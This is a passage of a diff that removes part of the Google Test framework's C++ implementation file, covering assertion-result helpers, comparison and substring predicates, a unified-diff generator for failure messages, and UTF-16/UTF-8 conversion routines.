-// value using delete[]. Returns the ANSI string, or NULL if the
-// input is NULL.
-const char* String::Utf16ToAnsi(LPCWSTR utf16_str)  {
-  if (!utf16_str) return NULL;
-  const int ansi_length =
-      WideCharToMultiByte(CP_ACP, 0, utf16_str, -1,
-                          NULL, 0, NULL, NULL);
-  char* ansi = new char[ansi_length + 1];
-  WideCharToMultiByte(CP_ACP, 0, utf16_str, -1,
-                      ansi, ansi_length, NULL, NULL);
-  ansi[ansi_length] = 0;
-  return ansi;
-}
-
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-// Compares two C strings.  Returns true iff they have the same content.
-//
-// Unlike strcmp(), this function can handle NULL argument(s).  A NULL
-// C string is considered different to any non-NULL C string,
-// including the empty string.
-bool String::CStringEquals(const char * lhs, const char * rhs) {
-  if ( lhs == NULL ) return rhs == NULL;
-
-  if ( rhs == NULL ) return false;
-
-  return strcmp(lhs, rhs) == 0;
-}
-
-#if GTEST_HAS_STD_WSTRING || GTEST_HAS_GLOBAL_WSTRING
-
-// Converts an array of wide chars to a narrow string using the UTF-8
-// encoding, and streams the result to the given Message object.
-static void StreamWideCharsToMessage(const wchar_t* wstr, size_t length,
-                                     Message* msg) {
-  for (size_t i = 0; i != length; ) {  // NOLINT
-    if (wstr[i] != L'\0') {
-      *msg << WideStringToUtf8(wstr + i, static_cast<int>(length - i));
-      while (i != length && wstr[i] != L'\0')
-        i++;
-    } else {
-      *msg << '\0';
-      i++;
-    }
-  }
-}
-
-#endif  // GTEST_HAS_STD_WSTRING || GTEST_HAS_GLOBAL_WSTRING
-
-}  // namespace internal
-
-// Constructs an empty Message.
-// We allocate the stringstream separately because otherwise each use of
-// ASSERT/EXPECT in a procedure adds over 200 bytes to the procedure's
-// stack frame leading to huge stack frames in some cases; gcc does not reuse
-// the stack space.
-Message::Message() : ss_(new ::std::stringstream) {
-  // By default, we want there to be enough precision when printing
-  // a double to a Message.
-  *ss_ << std::setprecision(std::numeric_limits<double>::digits10 + 2);
-}
-
-// These two overloads allow streaming a wide C string to a Message
-// using the UTF-8 encoding.
-Message& Message::operator <<(const wchar_t* wide_c_str) {
-  return *this << internal::String::ShowWideCString(wide_c_str);
-}
-Message& Message::operator <<(wchar_t* wide_c_str) {
-  return *this << internal::String::ShowWideCString(wide_c_str);
-}
-
-#if GTEST_HAS_STD_WSTRING
-// Converts the given wide string to a narrow string using the UTF-8
-// encoding, and streams the result to this Message object.
-Message& Message::operator <<(const ::std::wstring& wstr) {
-  internal::StreamWideCharsToMessage(wstr.c_str(), wstr.length(), this);
-  return *this;
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-#if GTEST_HAS_GLOBAL_WSTRING
-// Converts the given wide string to a narrow string using the UTF-8
-// encoding, and streams the result to this Message object.
-Message& Message::operator <<(const ::wstring& wstr) {
-  internal::StreamWideCharsToMessage(wstr.c_str(), wstr.length(), this);
-  return *this;
-}
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-// Gets the text streamed to this object so far as an std::string.
-// Each '\0' character in the buffer is replaced with "\\0".
-std::string Message::GetString() const {
-  return internal::StringStreamToString(ss_.get());
-}
-
-// AssertionResult constructors.
-// Used in EXPECT_TRUE/FALSE(assertion_result).
-AssertionResult::AssertionResult(const AssertionResult& other)
-    : success_(other.success_),
-      message_(other.message_.get() != NULL ?
-               new ::std::string(*other.message_) :
-               static_cast< ::std::string*>(NULL)) {
-}
-
-// Swaps two AssertionResults.
-void AssertionResult::swap(AssertionResult& other) {
-  using std::swap;
-  swap(success_, other.success_);
-  swap(message_, other.message_);
-}
-
-// Returns the assertion's negation. Used with EXPECT/ASSERT_FALSE.
-AssertionResult AssertionResult::operator!() const {
-  AssertionResult negation(!success_);
-  if (message_.get() != NULL)
-    negation << *message_;
-  return negation;
-}
-
-// Makes a successful assertion result.
-AssertionResult AssertionSuccess() {
-  return AssertionResult(true);
-}
-
-// Makes a failed assertion result.
-AssertionResult AssertionFailure() {
-  return AssertionResult(false);
-}
-
-// Makes a failed assertion result with the given failure message.
-// Deprecated; use AssertionFailure() << message.
-AssertionResult AssertionFailure(const Message& message) {
-  return AssertionFailure() << message;
-}
-
-namespace internal {
-
-namespace edit_distance {
-std::vector<EditType> CalculateOptimalEdits(const std::vector<size_t>& left,
-                                            const std::vector<size_t>& right) {
-  std::vector<std::vector<double> > costs(
-      left.size() + 1, std::vector<double>(right.size() + 1));
-  std::vector<std::vector<EditType> > best_move(
-      left.size() + 1, std::vector<EditType>(right.size() + 1));
-
-  // Populate for empty right.
-  for (size_t l_i = 0; l_i < costs.size(); ++l_i) {
-    costs[l_i][0] = static_cast<double>(l_i);
-    best_move[l_i][0] = kRemove;
-  }
-  // Populate for empty left.
-  for (size_t r_i = 1; r_i < costs[0].size(); ++r_i) {
-    costs[0][r_i] = static_cast<double>(r_i);
-    best_move[0][r_i] = kAdd;
-  }
-
-  for (size_t l_i = 0; l_i < left.size(); ++l_i) {
-    for (size_t r_i = 0; r_i < right.size(); ++r_i) {
-      if (left[l_i] == right[r_i]) {
-        // Found a match. Consume it.
-        costs[l_i + 1][r_i + 1] = costs[l_i][r_i];
-        best_move[l_i + 1][r_i + 1] = kMatch;
-        continue;
-      }
-
-      const double add = costs[l_i + 1][r_i];
-      const double remove = costs[l_i][r_i + 1];
-      const double replace = costs[l_i][r_i];
-      if (add < remove && add < replace) {
-        costs[l_i + 1][r_i + 1] = add + 1;
-        best_move[l_i + 1][r_i + 1] = kAdd;
-      } else if (remove < add && remove < replace) {
-        costs[l_i + 1][r_i + 1] = remove + 1;
-        best_move[l_i + 1][r_i + 1] = kRemove;
-      } else {
-        // We make replace a little more expensive than add/remove to lower
-        // their priority.
-        costs[l_i + 1][r_i + 1] = replace + 1.00001;
-        best_move[l_i + 1][r_i + 1] = kReplace;
-      }
-    }
-  }
-
-  // Reconstruct the best path. We do it in reverse order.
-  std::vector<EditType> best_path;
-  for (size_t l_i = left.size(), r_i = right.size(); l_i > 0 || r_i > 0;) {
-    EditType move = best_move[l_i][r_i];
-    best_path.push_back(move);
-    l_i -= move != kAdd;
-    r_i -= move != kRemove;
-  }
-  std::reverse(best_path.begin(), best_path.end());
-  return best_path;
-}
-
-namespace {
-
-// Helper class to convert string into ids with deduplication.
-class InternalStrings {
- public:
-  size_t GetId(const std::string& str) {
-    IdMap::iterator it = ids_.find(str);
-    if (it != ids_.end()) return it->second;
-    size_t id = ids_.size();
-    return ids_[str] = id;
-  }
-
- private:
-  typedef std::map<std::string, size_t> IdMap;
-  IdMap ids_;
-};
-
-}  // namespace
-
-std::vector<EditType> CalculateOptimalEdits(
-    const std::vector<std::string>& left,
-    const std::vector<std::string>& right) {
-  std::vector<size_t> left_ids, right_ids;
-  {
-    InternalStrings intern_table;
-    for (size_t i = 0; i < left.size(); ++i) {
-      left_ids.push_back(intern_table.GetId(left[i]));
-    }
-    for (size_t i = 0; i < right.size(); ++i) {
-      right_ids.push_back(intern_table.GetId(right[i]));
-    }
-  }
-  return CalculateOptimalEdits(left_ids, right_ids);
-}
-
-namespace {
-
-// Helper class that holds the state for one hunk and prints it out to the
-// stream.
-// It reorders adds/removes when possible to group all removes before all
-// adds. It also adds the hunk header before printint into the stream.
-class Hunk {
- public:
-  Hunk(size_t left_start, size_t right_start)
-      : left_start_(left_start),
-        right_start_(right_start),
-        adds_(),
-        removes_(),
-        common_() {}
-
-  void PushLine(char edit, const char* line) {
-    switch (edit) {
-      case ' ':
-        ++common_;
-        FlushEdits();
-        hunk_.push_back(std::make_pair(' ', line));
-        break;
-      case '-':
-        ++removes_;
-        hunk_removes_.push_back(std::make_pair('-', line));
-        break;
-      case '+':
-        ++adds_;
-        hunk_adds_.push_back(std::make_pair('+', line));
-        break;
-    }
-  }
-
-  void PrintTo(std::ostream* os) {
-    PrintHeader(os);
-    FlushEdits();
-    for (std::list<std::pair<char, const char*> >::const_iterator it =
-             hunk_.begin();
-         it != hunk_.end(); ++it) {
-      *os << it->first << it->second << "\n";
-    }
-  }
-
-  bool has_edits() const { return adds_ || removes_; }
-
- private:
-  void FlushEdits() {
-    hunk_.splice(hunk_.end(), hunk_removes_);
-    hunk_.splice(hunk_.end(), hunk_adds_);
-  }
-
-  // Print a unified diff header for one hunk.
-  // The format is
-  //   "@@ -<left_start>,<left_length> +<right_start>,<right_length> @@"
-  // where the left/right parts are omitted if unnecessary.
-  void PrintHeader(std::ostream* ss) const {
-    *ss << "@@ ";
-    if (removes_) {
-      *ss << "-" << left_start_ << "," << (removes_ + common_);
-    }
-    if (removes_ && adds_) {
-      *ss << " ";
-    }
-    if (adds_) {
-      *ss << "+" << right_start_ << "," << (adds_ + common_);
-    }
-    *ss << " @@\n";
-  }
-
-  size_t left_start_, right_start_;
-  size_t adds_, removes_, common_;
-  std::list<std::pair<char, const char*> > hunk_, hunk_adds_, hunk_removes_;
-};
-
-}  // namespace
-
-// Create a list of diff hunks in Unified diff format.
-// Each hunk has a header generated by PrintHeader above plus a body with
-// lines prefixed with ' ' for no change, '-' for deletion and '+' for
-// addition.
-// 'context' represents the desired unchanged prefix/suffix around the diff.
-// If two hunks are close enough that their contexts overlap, then they are
-// joined into one hunk.
-std::string CreateUnifiedDiff(const std::vector<std::string>& left,
-                              const std::vector<std::string>& right,
-                              size_t context) {
-  const std::vector<EditType> edits = CalculateOptimalEdits(left, right);
-
-  size_t l_i = 0, r_i = 0, edit_i = 0;
-  std::stringstream ss;
-  while (edit_i < edits.size()) {
-    // Find first edit.
-    while (edit_i < edits.size() && edits[edit_i] == kMatch) {
-      ++l_i;
-      ++r_i;
-      ++edit_i;
-    }
-
-    // Find the first line to include in the hunk.
-    const size_t prefix_context = std::min(l_i, context);
-    Hunk hunk(l_i - prefix_context + 1, r_i - prefix_context + 1);
-    for (size_t i = prefix_context; i > 0; --i) {
-      hunk.PushLine(' ', left[l_i - i].c_str());
-    }
-
-    // Iterate the edits until we found enough suffix for the hunk or the input
-    // is over.
-    size_t n_suffix = 0;
-    for (; edit_i < edits.size(); ++edit_i) {
-      if (n_suffix >= context) {
-        // Continue only if the next hunk is very close.
-        std::vector<EditType>::const_iterator it = edits.begin() + edit_i;
-        while (it != edits.end() && *it == kMatch) ++it;
-        if (it == edits.end() || (it - edits.begin()) - edit_i >= context) {
-          // There is no next edit or it is too far away.
-          break;
-        }
-      }
-
-      EditType edit = edits[edit_i];
-      // Reset count when a non match is found.
-      n_suffix = edit == kMatch ? n_suffix + 1 : 0;
-
-      if (edit == kMatch || edit == kRemove || edit == kReplace) {
-        hunk.PushLine(edit == kMatch ? ' ' : '-', left[l_i].c_str());
-      }
-      if (edit == kAdd || edit == kReplace) {
-        hunk.PushLine('+', right[r_i].c_str());
-      }
-
-      // Advance indices, depending on edit type.
-      l_i += edit != kAdd;
-      r_i += edit != kRemove;
-    }
-
-    if (!hunk.has_edits()) {
-      // We are done. We don't want this hunk.
-      break;
-    }
-
-    hunk.PrintTo(&ss);
-  }
-  return ss.str();
-}
-
-}  // namespace edit_distance
-
-namespace {
-
-// The string representation of the values received in EqFailure() are already
-// escaped. Split them on escaped '\n' boundaries. Leave all other escaped
-// characters the same.
-std::vector<std::string> SplitEscapedString(const std::string& str) {
-  std::vector<std::string> lines;
-  size_t start = 0, end = str.size();
-  if (end > 2 && str[0] == '"' && str[end - 1] == '"') {
-    ++start;
-    --end;
-  }
-  bool escaped = false;
-  for (size_t i = start; i + 1 < end; ++i) {
-    if (escaped) {
-      escaped = false;
-      if (str[i] == 'n') {
-        lines.push_back(str.substr(start, i - start - 1));
-        start = i + 1;
-      }
-    } else {
-      escaped = str[i] == '\\';
-    }
-  }
-  lines.push_back(str.substr(start, end - start));
-  return lines;
-}
-
-}  // namespace
-
-// Constructs and returns the message for an equality assertion
-// (e.g. ASSERT_EQ, EXPECT_STREQ, etc) failure.
-//
-// The first four parameters are the expressions used in the assertion
-// and their values, as strings.  For example, for ASSERT_EQ(foo, bar)
-// where foo is 5 and bar is 6, we have:
-//
-//   expected_expression: "foo"
-//   actual_expression:   "bar"
-//   expected_value:      "5"
-//   actual_value:        "6"
-//
-// The ignoring_case parameter is true iff the assertion is a
-// *_STRCASEEQ*.  When it's true, the string " (ignoring case)" will
-// be inserted into the message.
-AssertionResult EqFailure(const char* expected_expression,
-                          const char* actual_expression,
-                          const std::string& expected_value,
-                          const std::string& actual_value,
-                          bool ignoring_case) {
-  Message msg;
-  msg << "Value of: " << actual_expression;
-  if (actual_value != actual_expression) {
-    msg << "\n  Actual: " << actual_value;
-  }
-
-  msg << "\nExpected: " << expected_expression;
-  if (ignoring_case) {
-    msg << " (ignoring case)";
-  }
-  if (expected_value != expected_expression) {
-    msg << "\nWhich is: " << expected_value;
-  }
-
-  if (!expected_value.empty() && !actual_value.empty()) {
-    const std::vector<std::string> expected_lines =
-        SplitEscapedString(expected_value);
-    const std::vector<std::string> actual_lines =
-        SplitEscapedString(actual_value);
-    if (expected_lines.size() > 1 || actual_lines.size() > 1) {
-      msg << "\nWith diff:\n"
-          << edit_distance::CreateUnifiedDiff(expected_lines, actual_lines);
-    }
-  }
-
-  return AssertionFailure() << msg;
-}
-
-// Constructs a failure message for Boolean assertions such as EXPECT_TRUE.
-std::string GetBoolAssertionFailureMessage(
-    const AssertionResult& assertion_result,
-    const char* expression_text,
-    const char* actual_predicate_value,
-    const char* expected_predicate_value) {
-  const char* actual_message = assertion_result.message();
-  Message msg;
-  msg << "Value of: " << expression_text
-      << "\n  Actual: " << actual_predicate_value;
-  if (actual_message[0] != '\0')
-    msg << " (" << actual_message << ")";
-  msg << "\nExpected: " << expected_predicate_value;
-  return msg.GetString();
-}
-
-// Helper function for implementing ASSERT_NEAR.
-AssertionResult DoubleNearPredFormat(const char* expr1,
-                                     const char* expr2,
-                                     const char* abs_error_expr,
-                                     double val1,
-                                     double val2,
-                                     double abs_error) {
-  const double diff = fabs(val1 - val2);
-  if (diff <= abs_error) return AssertionSuccess();
-
-  // TODO(wan): do not print the value of an expression if it's
-  // already a literal.
-  return AssertionFailure()
-      << "The difference between " << expr1 << " and " << expr2
-      << " is " << diff << ", which exceeds " << abs_error_expr << ", where\n"
-      << expr1 << " evaluates to " << val1 << ",\n"
-      << expr2 << " evaluates to " << val2 << ", and\n"
-      << abs_error_expr << " evaluates to " << abs_error << ".";
-}
-
-
-// Helper template for implementing FloatLE() and DoubleLE().
-template <typename RawType>
-AssertionResult FloatingPointLE(const char* expr1,
-                                const char* expr2,
-                                RawType val1,
-                                RawType val2) {
-  // Returns success if val1 is less than val2,
-  if (val1 < val2) {
-    return AssertionSuccess();
-  }
-
-  // or if val1 is almost equal to val2.
-  const FloatingPoint<RawType> lhs(val1), rhs(val2);
-  if (lhs.AlmostEquals(rhs)) {
-    return AssertionSuccess();
-  }
-
-  // Note that the above two checks will both fail if either val1 or
-  // val2 is NaN, as the IEEE floating-point standard requires that
-  // any predicate involving a NaN must return false.
-
-  ::std::stringstream val1_ss;
-  val1_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-          << val1;
-
-  ::std::stringstream val2_ss;
-  val2_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-          << val2;
-
-  return AssertionFailure()
-      << "Expected: (" << expr1 << ") <= (" << expr2 << ")\n"
-      << "  Actual: " << StringStreamToString(&val1_ss) << " vs "
-      << StringStreamToString(&val2_ss);
-}
-
-}  // namespace internal
-
-// Asserts that val1 is less than, or almost equal to, val2.  Fails
-// otherwise.  In particular, it fails if either val1 or val2 is NaN.
-AssertionResult FloatLE(const char* expr1, const char* expr2,
-                        float val1, float val2) {
-  return internal::FloatingPointLE<float>(expr1, expr2, val1, val2);
-}
-
-// Asserts that val1 is less than, or almost equal to, val2.  Fails
-// otherwise.  In particular, it fails if either val1 or val2 is NaN.
-AssertionResult DoubleLE(const char* expr1, const char* expr2,
-                         double val1, double val2) {
-  return internal::FloatingPointLE<double>(expr1, expr2, val1, val2);
-}
-
-namespace internal {
-
-// The helper function for {ASSERT|EXPECT}_EQ with int or enum
-// arguments.
-AssertionResult CmpHelperEQ(const char* expected_expression,
-                            const char* actual_expression,
-                            BiggestInt expected,
-                            BiggestInt actual) {
-  if (expected == actual) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   FormatForComparisonFailureMessage(expected, actual),
-                   FormatForComparisonFailureMessage(actual, expected),
-                   false);
-}
-
-// A macro for implementing the helper functions needed to implement
-// ASSERT_?? and EXPECT_?? with integer or enum arguments.  It is here
-// just to avoid copy-and-paste of similar code.
-#define GTEST_IMPL_CMP_HELPER_(op_name, op)\
-AssertionResult CmpHelper##op_name(const char* expr1, const char* expr2, \
-                                   BiggestInt val1, BiggestInt val2) {\
-  if (val1 op val2) {\
-    return AssertionSuccess();\
-  } else {\
-    return AssertionFailure() \
-        << "Expected: (" << expr1 << ") " #op " (" << expr2\
-        << "), actual: " << FormatForComparisonFailureMessage(val1, val2)\
-        << " vs " << FormatForComparisonFailureMessage(val2, val1);\
-  }\
-}
-
-// Implements the helper function for {ASSERT|EXPECT}_NE with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(NE, !=)
-// Implements the helper function for {ASSERT|EXPECT}_LE with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(LE, <=)
-// Implements the helper function for {ASSERT|EXPECT}_LT with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(LT, < )
-// Implements the helper function for {ASSERT|EXPECT}_GE with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(GE, >=)
-// Implements the helper function for {ASSERT|EXPECT}_GT with int or
-// enum arguments.
-GTEST_IMPL_CMP_HELPER_(GT, > )
-
-#undef GTEST_IMPL_CMP_HELPER_
-
-// The helper function for {ASSERT|EXPECT}_STREQ.
-AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                               const char* actual_expression,
-                               const char* expected,
-                               const char* actual) {
-  if (String::CStringEquals(expected, actual)) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   PrintToString(expected),
-                   PrintToString(actual),
-                   false);
-}
-
-// The helper function for {ASSERT|EXPECT}_STRCASEEQ.
-AssertionResult CmpHelperSTRCASEEQ(const char* expected_expression,
-                                   const char* actual_expression,
-                                   const char* expected,
-                                   const char* actual) {
-  if (String::CaseInsensitiveCStringEquals(expected, actual)) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   PrintToString(expected),
-                   PrintToString(actual),
-                   true);
-}
-
-// The helper function for {ASSERT|EXPECT}_STRNE.
-AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                               const char* s2_expression,
-                               const char* s1,
-                               const char* s2) {
-  if (!String::CStringEquals(s1, s2)) {
-    return AssertionSuccess();
-  } else {
-    return AssertionFailure() << "Expected: (" << s1_expression << ") != ("
-                              << s2_expression << "), actual: \""
-                              << s1 << "\" vs \"" << s2 << "\"";
-  }
-}
-
-// The helper function for {ASSERT|EXPECT}_STRCASENE.
-AssertionResult CmpHelperSTRCASENE(const char* s1_expression,
-                                   const char* s2_expression,
-                                   const char* s1,
-                                   const char* s2) {
-  if (!String::CaseInsensitiveCStringEquals(s1, s2)) {
-    return AssertionSuccess();
-  } else {
-    return AssertionFailure()
-        << "Expected: (" << s1_expression << ") != ("
-        << s2_expression << ") (ignoring case), actual: \""
-        << s1 << "\" vs \"" << s2 << "\"";
-  }
-}
-
-}  // namespace internal
-
-namespace {
-
-// Helper functions for implementing IsSubString() and IsNotSubstring().
-
-// This group of overloaded functions return true iff needle is a
-// substring of haystack.  NULL is considered a substring of itself
-// only.
-
-bool IsSubstringPred(const char* needle, const char* haystack) {
-  if (needle == NULL || haystack == NULL)
-    return needle == haystack;
-
-  return strstr(haystack, needle) != NULL;
-}
-
-bool IsSubstringPred(const wchar_t* needle, const wchar_t* haystack) {
-  if (needle == NULL || haystack == NULL)
-    return needle == haystack;
-
-  return wcsstr(haystack, needle) != NULL;
-}
-
-// StringType here can be either ::std::string or ::std::wstring.
-template <typename StringType>
-bool IsSubstringPred(const StringType& needle,
-                     const StringType& haystack) {
-  return haystack.find(needle) != StringType::npos;
-}
-
-// This function implements either IsSubstring() or IsNotSubstring(),
-// depending on the value of the expected_to_be_substring parameter.
-// StringType here can be const char*, const wchar_t*, ::std::string,
-// or ::std::wstring.
-template <typename StringType>
-AssertionResult IsSubstringImpl(
-    bool expected_to_be_substring,
-    const char* needle_expr, const char* haystack_expr,
-    const StringType& needle, const StringType& haystack) {
-  if (IsSubstringPred(needle, haystack) == expected_to_be_substring)
-    return AssertionSuccess();
-
-  const bool is_wide_string = sizeof(needle[0]) > 1;
-  const char* const begin_string_quote = is_wide_string ? "L\"" : "\"";
-  return AssertionFailure()
-      << "Value of: " << needle_expr << "\n"
-      << "  Actual: " << begin_string_quote << needle << "\"\n"
-      << "Expected: " << (expected_to_be_substring ? "" : "not ")
-      << "a substring of " << haystack_expr << "\n"
-      << "Which is: " << begin_string_quote << haystack << "\"";
-}
-
-}  // namespace
-
-// IsSubstring() and IsNotSubstring() check whether needle is a
-// substring of haystack (NULL is considered a substring of itself
-// only), and return an appropriate error message when they fail.
-
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-
-#if GTEST_HAS_STD_WSTRING
-AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack) {
-  return IsSubstringImpl(true, needle_expr, haystack_expr, needle, haystack);
-}
-
-AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack) {
-  return IsSubstringImpl(false, needle_expr, haystack_expr, needle, haystack);
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-namespace internal {
-
-#if GTEST_OS_WINDOWS
-
-namespace {
-
-// Helper function for IsHRESULT{SuccessFailure} predicates
-AssertionResult HRESULTFailureHelper(const char* expr,
-                                     const char* expected,
-                                     long hr) {  // NOLINT
-# if GTEST_OS_WINDOWS_MOBILE
-
-  // Windows CE doesn't support FormatMessage.
-  const char error_text[] = "";
-
-# else
-
-  // Looks up the human-readable system message for the HRESULT code
-  // and since we're not passing any params to FormatMessage, we don't
-  // want inserts expanded.
-  const DWORD kFlags = FORMAT_MESSAGE_FROM_SYSTEM |
-                       FORMAT_MESSAGE_IGNORE_INSERTS;
-  const DWORD kBufSize = 4096;
-  // Gets the system's human readable message string for this HRESULT.
-  char error_text[kBufSize] = { '\0' };
-  DWORD message_length = ::FormatMessageA(kFlags,
-                                          0,  // no source, we're asking system
-                                          hr,  // the error
-                                          0,  // no line width restrictions
-                                          error_text,  // output buffer
-                                          kBufSize,  // buf size
-                                          NULL);  // no arguments for inserts
-  // Trims tailing white space (FormatMessage leaves a trailing CR-LF)
-  for (; message_length && IsSpace(error_text[message_length - 1]);
-          --message_length) {
-    error_text[message_length - 1] = '\0';
-  }
-
-# endif  // GTEST_OS_WINDOWS_MOBILE
-
-  const std::string error_hex("0x" + String::FormatHexInt(hr));
-  return ::testing::AssertionFailure()
-      << "Expected: " << expr << " " << expected << ".\n"
-      << "  Actual: " << error_hex << " " << error_text << "\n";
-}
-
-}  // namespace
-
-AssertionResult IsHRESULTSuccess(const char* expr, long hr) {  // NOLINT
-  if (SUCCEEDED(hr)) {
-    return AssertionSuccess();
-  }
-  return HRESULTFailureHelper(expr, "succeeds", hr);
-}
-
-AssertionResult IsHRESULTFailure(const char* expr, long hr) {  // NOLINT
-  if (FAILED(hr)) {
-    return AssertionSuccess();
-  }
-  return HRESULTFailureHelper(expr, "fails", hr);
-}
-
-#endif  // GTEST_OS_WINDOWS
-
-// Utility functions for encoding Unicode text (wide strings) in
-// UTF-8.
-
-// A Unicode code-point can have upto 21 bits, and is encoded in UTF-8
-// like this:
-//
-// Code-point length   Encoding
-//   0 -  7 bits       0xxxxxxx
-//   8 - 11 bits       110xxxxx 10xxxxxx
-//  12 - 16 bits       1110xxxx 10xxxxxx 10xxxxxx
-//  17 - 21 bits       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
-
-// The maximum code-point a one-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint1 = (static_cast<UInt32>(1) <<  7) - 1;
-
-// The maximum code-point a two-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint2 = (static_cast<UInt32>(1) << (5 + 6)) - 1;
-
-// The maximum code-point a three-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint3 = (static_cast<UInt32>(1) << (4 + 2*6)) - 1;
-
-// The maximum code-point a four-byte UTF-8 sequence can represent.
-const UInt32 kMaxCodePoint4 = (static_cast<UInt32>(1) << (3 + 3*6)) - 1;
-
-// Chops off the n lowest bits from a bit pattern.  Returns the n
-// lowest bits.  As a side effect, the original bit pattern will be
-// shifted to the right by n bits.
-inline UInt32 ChopLowBits(UInt32* bits, int n) {
-  const UInt32 low_bits = *bits & ((static_cast<UInt32>(1) << n) - 1);
-  *bits >>= n;
-  return low_bits;
-}
-
-// Converts a Unicode code point to a narrow string in UTF-8 encoding.
-// code_point parameter is of type UInt32 because wchar_t may not be
-// wide enough to contain a code point.
-// If the code_point is not a valid Unicode code point
-// (i.e. outside of Unicode range U+0 to U+10FFFF) it will be converted
-// to "(Invalid Unicode 0xXXXXXXXX)".
-std::string CodePointToUtf8(UInt32 code_point) {
-  if (code_point > kMaxCodePoint4) {
-    return "(Invalid Unicode 0x" + String::FormatHexInt(code_point) + ")";
-  }
-
-  char str[5];  // Big enough for the largest valid code point.
-  if (code_point <= kMaxCodePoint1) {
-    str[1] = '\0';
-    str[0] = static_cast<char>(code_point);                          // 0xxxxxxx
-  } else if (code_point <= kMaxCodePoint2) {
-    str[2] = '\0';
-    str[1] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[0] = static_cast<char>(0xC0 | code_point);                   // 110xxxxx
-  } else if (code_point <= kMaxCodePoint3) {
-    str[3] = '\0';
-    str[2] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[1] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[0] = static_cast<char>(0xE0 | code_point);                   // 1110xxxx
-  } else {  // code_point <= kMaxCodePoint4
-    str[4] = '\0';
-    str[3] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[2] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[1] = static_cast<char>(0x80 | ChopLowBits(&code_point, 6));  // 10xxxxxx
-    str[0] = static_cast<char>(0xF0 | code_point);                   // 11110xxx
-  }
-  return str;
-}
-
-// The following two functions only make sense if the system
-// uses UTF-16 for wide string encoding. All supported systems
-// with 16 bit wchar_t (Windows, Cygwin, Symbian OS) do use UTF-16.
-
-// Determines if the arguments constitute UTF-16 surrogate pair
-// and thus should be combined into a single Unicode code point
-// using CreateCodePointFromUtf16SurrogatePair.
-inline bool IsUtf16SurrogatePair(wchar_t first, wchar_t second) {
-  return sizeof(wchar_t) == 2 &&
-      (first & 0xFC00) == 0xD800 && (second & 0xFC00) == 0xDC00;
-}
-
-// Creates a Unicode code point from UTF16 surrogate pair.
-inline UInt32 CreateCodePointFromUtf16SurrogatePair(wchar_t first,
-                                                    wchar_t second) {
-  const UInt32 mask = (1 << 10) - 1;
-  return (sizeof(wchar_t) == 2) ?
-      (((first & mask) << 10) | (second & mask)) + 0x10000 :
-      // This function should not be called when the condition is
-      // false, but we provide a sensible default in case it is.
-      static_cast<UInt32>(first);
-}
-
-// Converts a wide string to a narrow string in UTF-8 encoding.
-// The wide string is assumed to have the following encoding:
-//   UTF-16 if sizeof(wchar_t) == 2 (on Windows, Cygwin, Symbian OS)
-//   UTF-32 if sizeof(wchar_t) == 4 (on Linux)
-// Parameter str points to a null-terminated wide string.
-// Parameter num_chars may additionally limit the number
-// of wchar_t characters processed. -1 is used when the entire string
-// should be processed.
-// If the string contains code points that are not valid Unicode code points
-// (i.e. outside of Unicode range U+0 to U+10FFFF) they will be output
-// as '(Invalid Unicode 0xXXXXXXXX)'. If the string is in UTF16 encoding
-// and contains invalid UTF-16 surrogate pairs, values in those pairs
-// will be encoded as individual Unicode characters from Basic Normal Plane.
-std::string WideStringToUtf8(const wchar_t* str, int num_chars) {
-  if (num_chars == -1)
-    num_chars = static_cast<int>(wcslen(str));
-
-  ::std::stringstream stream;
-  for (int i = 0; i < num_chars; ++i) {
-    UInt32 unicode_code_point;
-
-    if (str[i] == L'\0') {
-      break;
